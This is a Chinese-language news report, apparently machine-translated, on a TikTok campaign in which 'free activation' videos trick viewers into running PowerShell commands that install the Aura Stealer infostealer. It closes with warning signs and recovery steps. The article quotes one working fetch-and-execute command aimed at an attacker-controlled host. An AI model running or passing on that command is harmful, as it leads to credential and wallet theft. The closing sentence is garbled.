TikTok 上出现了一波视频,承诺无需付费即可“激活”Windows、Photoshop 或 Netflix,但实际上却引导用户运行 伪装指令最终安装恶意软件 并将你的数据提供给犯罪分子。在简单的技术指南的幌子下,创建者概述了一些步骤,如果严格按照这些步骤操作, 打开感染和凭证盗窃的大门.
SANS 互联网风暴中心的研究人员(包括 Xavier Mertens)以及 BleepingComputer 和 Trend Micro 分析师等专业媒体描述了一场利用名为 点击修复。本质上,受害者被说服扔 PowerShell命令,连接到远程服务器和 下载恶意负载 甚至托管在合法服务上,例如 Cloudflare Pages。
视频和感染链如何运作
这些剪辑重现了“一步一步”教程的风格,并使用 模仿技术支持的视觉说明目标是让用户复制一个简短的命令,例如 iex (irm slmgr.win/photoshop),并在 PowerShell 中以管理员权限运行它。这个看似无害的简单操作, 触发脚本下载 来自攻击者控制的网站的附加信息。
一旦执行了第一个脚本,就会发生第二阶段: 两个可执行文件到达 到远程基础设施的团队。根据分析,其中一个对应于 光环窃取者,一个能够收集敏感数据的信息窃贼;另一个 编译或部署代码 按需使用,其确切目的仍不清楚,尽管它暗示了攻击扩展或持久性功能。
这场运动的成功取决于 合法性意识 这些视频传达的信息是:针对每个软件的“量身定制”命令、简短的解释,以及鼓励你不假思索就行动的格式。这些视频融合了快速操作、对创作者的信任,以及免费获得“高级”功能的承诺。 降低用户警觉性.
攻击者还利用了TikTok的庞大影响力。只需几条内容,一个新创建的账户就能积累数千次浏览量,这 扩大诈骗范围 几个小时之内。
他们窃取了哪些数据并获得哪些控制权
一旦激活,光环窃取者就会专注于 提取登录凭证、身份验证 cookie 以及可能访问 加密货币钱包 存储在浏览器或应用程序中。如果这些信息落入犯罪分子手中,他们就有可能访问电子邮件、社交媒体或银行等服务。
第二个观察到的可执行文件可以充当 支持模块无论是扩展功能、维护访问权限,还是增加恶意软件清除的难度。专家不排除部署额外组件的可能性,这 增加了后续使用的风险,例如将计算机变成僵尸网络的一部分或促进进一步的攻击。
对于那些遵循所谓“诡计”的人来说,直接的后果是显而易见的: 密码泄露 并可能泄露个人和财务数据。此外,以管理员权限执行代码 可以进行深度控制 从系统到第三方。
警告信号以及如何保护自己
最好警惕任何承诺“免费激活”或“解锁”付费功能的视频。例如 终端命令、缩短的链接、官方网站之外的下载、活动很少的个人资料或禁用的评论都是不容忽视的危险信号。
- 禁止复制或执行 在社交媒体上看到的命令,尤其是在 PowerShell 或具有提升权限的终端中。
- 一律使用 合法软件和许可证 并避免未经验证的安装程序或破解。
- 保持 更新系统和防病毒软件 并在所有帐户上启用两步验证。
- 警惕链接和下载 官方页面之外 来自供应商。
如果你已经摔倒了该怎么办
如果您按照以下视频中的说明操作,请立即采取行动: 更改您所有的密码 (电子邮件、网络、银行、流媒体服务)来自您认为干净且与受感染设备不同的设备。
- 做一个 全面分析 并采用更新的安全解决方案。
- 删除最近运行的不认识的程序或文件,如果检测到异常活动, 断开设备与网络的连接 直到感染得到解决。
- 考虑恢复系统或 重新安装 如果损坏仍然存在,请在所有支持的服务上启用 2FA。
尽管这些“便宜货”可能很诱人,但 获取未经授权的付费软件的合法方法。避免运行来自未知来源的命令并将自己限制在官方渠道是迄今为止避免运行来自未知来源的命令的最佳方法。 避免这些活动的最佳方法 他们利用快速格式并信任 TikTok。